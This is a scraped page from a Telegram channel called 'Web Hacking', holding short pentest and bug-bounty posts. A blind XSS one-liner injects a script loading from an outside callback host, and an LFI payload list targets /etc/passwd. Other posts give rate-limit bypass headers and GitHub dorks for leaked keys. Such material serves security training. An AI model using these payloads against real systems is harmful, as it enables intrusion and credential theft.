Web Hacking
@WebHacking
2.09K subscribers
41 photos
6 files
37 links
@CEH_training
@OSCP_training
@pfsense
@WifiHacking
Download Telegram
About
Blog
Apps
Platform
Join
Web Hacking
2.09K subscribers
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Checklist; After Recon
3.1K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Rate Limit Bypass Headers
3.4K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
3.5K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
IDOR Checklist !
4.0K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Testing Authentication Flaws in Web Application
4.2K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Some filter bypass payload list while hunting for LFi vulnerability


β†’index.php?page=....//....//etc/passwd
β†’index.php?page=..///////..////..//////etc/passwd
β†’index.php?page=/var/www/../../etc/passwd
3.9K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
LFI Parameters
4.1K views
Web Hacking
Remote File Inclusion (RFI)
13.6K views
Web Hacking
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
15.2K views
Web Hacking
5.4K views
Web Hacking
403 bypass techniques
17.8K views
Web Hacking
Bypassing Rate Limit Protection
20.2K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
6.5K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools
6.0K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://twitter.com/intigriti/status/1646104705561403398?t=4R1LPKlBM4bEvhM6pmiPsQ&s=19
X (formerly Twitter)
Intigriti (@intigriti) on X
5 CSRF exploitation techniques πŸ§΅πŸ‘‡
5.9K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion
5.4K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
SSRF Techniques Roadmap
5.7K views
Web Hacking
https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
WhatsApp.com
Cyber Security | WhatsApp Channel
Cyber Security WhatsApp Channel. . 403 followers
4.5K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
WhatsApp'ta Cyber Security kanalΔ±nΔ± takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
WhatsApp.com
Cyber Security | WhatsApp Channel
Cyber Security WhatsApp Channel. . 403 followers
3.4K views
Web Hacking
HTTP Host Header Attack
https://www.saygili.org/2020/11/http-host-header-attack.html
Erhan SAYGILI
HTTP Host Header Attack
3.6K views